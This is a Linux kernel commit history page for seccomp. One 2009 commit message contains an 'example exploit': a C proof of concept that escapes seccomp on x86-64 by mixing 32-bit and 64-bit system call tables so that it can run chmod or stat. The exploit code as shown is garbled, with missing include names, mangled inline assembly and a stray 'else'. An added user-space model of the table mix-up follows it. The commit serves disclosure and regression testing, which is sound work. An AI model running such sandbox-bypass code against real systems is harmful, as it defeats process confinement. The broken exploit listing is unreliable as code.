18 Jan, 2012

1 commit

  • The audit system likes to collect information about processes that end
    abnormally (SIGSEGV) as this may be useful intrusion detection information.
    This patch adds audit support to collect information when seccomp forces a
    task to exit because of misbehavior in a similar way.

    Signed-off-by: Eric Paris

    Eric Paris
     

03 Mar, 2009

1 commit

  • On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
    ljmp, and then use the "syscall" instruction to make a 64-bit system
    call. A 64-bit process can make a 32-bit system call with int $0x80.

    In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
    the wrong system call number table. The fix is simple: test TS_COMPAT
    instead of TIF_IA32. Here is an example exploit:

    /* test case for seccomp circumvention on x86-64

    There are two failure modes: compile with -m64 or compile with -m32.

    The -m64 case is the worst one, because it does "chmod 777 ." (could
    be any chmod call). The -m32 case demonstrates it was able to do
    stat(), which can glean information but not harm anything directly.

    A buggy kernel will let the test do something, print, and exit 1; a
    fixed kernel will make it exit with SIGKILL before it does anything.
    */

    #define _GNU_SOURCE
    #include
    #include
    #include
    #include
    #include
    #include
    #include

    int
    main (int argc, char **argv)
    {
      char buf[100];
      static const char dot[] = ".";
      long ret;
      unsigned st[24];

      if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
        perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

    #ifdef __x86_64__
    assert ((uintptr_t) dot < (1UL << 32));
    asm ("int $0x80 # %0 st_uid=%u\n", st[7]);
    else
    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
    #else
    # error "not this one"
    #endif

      write (1, buf, ret);

      syscall (__NR_exit, 1);
      return 2;
    }

    Signed-off-by: Roland McGrath
    [ I don't know if anybody actually uses seccomp, but it's enabled in
    at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
    Signed-off-by: Linus Torvalds

    Roland McGrath
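
The table mix-up described in the commit message above, as a user-space model added here; it is not kernel code and not part of the commit. `check_buggy` picks the allow-list from the per-task flag (TIF_IA32), `check_fixed` from the per-system-call flag (TS_COMPAT). The struct and function names are hypothetical; the numbers are the standard x86-64 and i386 system call numbers.

```c
#include <stdbool.h>
#include <stdio.h>

/* User-space model of the seccomp mode 1 check; hypothetical names. */
struct task_model {
    bool tif_ia32;  /* per task: the process is a 32-bit one */
    bool ts_compat; /* per call: this entry used the 32-bit syscall path */
};

/* Mode 1 permits read, write, exit, sigreturn; the numbers differ per ABI. */
static const int allowed_64[] = { 0, 1, 60, 15, -1 };  /* x86-64 numbers */
static const int allowed_32[] = { 3, 4, 1, 119, -1 };  /* i386 numbers */

static bool in_table(const int *tbl, int nr)
{
    for (; *tbl >= 0; tbl++)
        if (*tbl == nr)
            return true;
    return false;
}

/* Before the fix: allow-list chosen by what kind of process this is. */
bool check_buggy(const struct task_model *t, int nr)
{
    return in_table(t->tif_ia32 ? allowed_32 : allowed_64, nr);
}

/* After the fix: allow-list chosen by how this system call was entered,
   which is also what decides the table the kernel dispatches through. */
bool check_fixed(const struct task_model *t, int nr)
{
    return in_table(t->ts_compat ? allowed_32 : allowed_64, nr);
}

int main(void)
{
    /* 64-bit process entering via int $0x80: nr 15 is rt_sigreturn in the
       x86-64 table but chmod in the i386 table that actually runs. */
    struct task_model m64 = { .tif_ia32 = false, .ts_compat = true };
    /* 32-bit process entering via syscall in 64-bit mode: nr 4 is write
       in the i386 table but stat in the x86-64 table that actually runs. */
    struct task_model m32 = { .tif_ia32 = true, .ts_compat = false };

    printf("-m64 case, nr 15: buggy=%d fixed=%d\n",
           check_buggy(&m64, 15), check_fixed(&m64, 15));
    printf("-m32 case, nr 4:  buggy=%d fixed=%d\n",
           check_buggy(&m32, 4), check_fixed(&m32, 4));
    return 0;
}
```

When both flags agree (an ordinary 64-bit or 32-bit process using its native entry path), the two checks return the same answer, which is why the difference only shows up in the mixed-mode cases.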
     

17 Jul, 2007

2 commits

  • This follows a suggestion from Chuck Ebbert on how to make seccomp
    absolutely zerocost in schedule too. The only remaining footprint of
    seccomp is in terms of the bzImage size that becomes a few bytes (perhaps
    even a few kbytes) larger, measure it if you care in the embedded.

    Signed-off-by: Andrea Arcangeli
    Cc: Andi Kleen
    Signed-off-by: Andrew Morton
    Signed-off-by: Linus Torvalds

    Andrea Arcangeli
     
  • This reduces the memory footprint and it enforces that only the current
    task can enable seccomp on itself (this is a requirement for a
    straightforward [modulo preempt ;) ] TIF_NOTSC implementation).

    Signed-off-by: Andrea Arcangeli
    Signed-off-by: Andrew Morton
    Signed-off-by: Linus Torvalds

    Andrea Arcangeli
     

17 Apr, 2005

1 commit

  • Initial git repository build. I'm not bothering with the full history,
    even though we have it. We can create a separate "historical" git
    archive of that later if we want to, and in the meantime it's about
    3.2GB when imported into git - space that would just make the early
    git days unnecessarily complicated, when we don't have a lot of good
    infrastructure for it.

    Let it rip!

    Linus Torvalds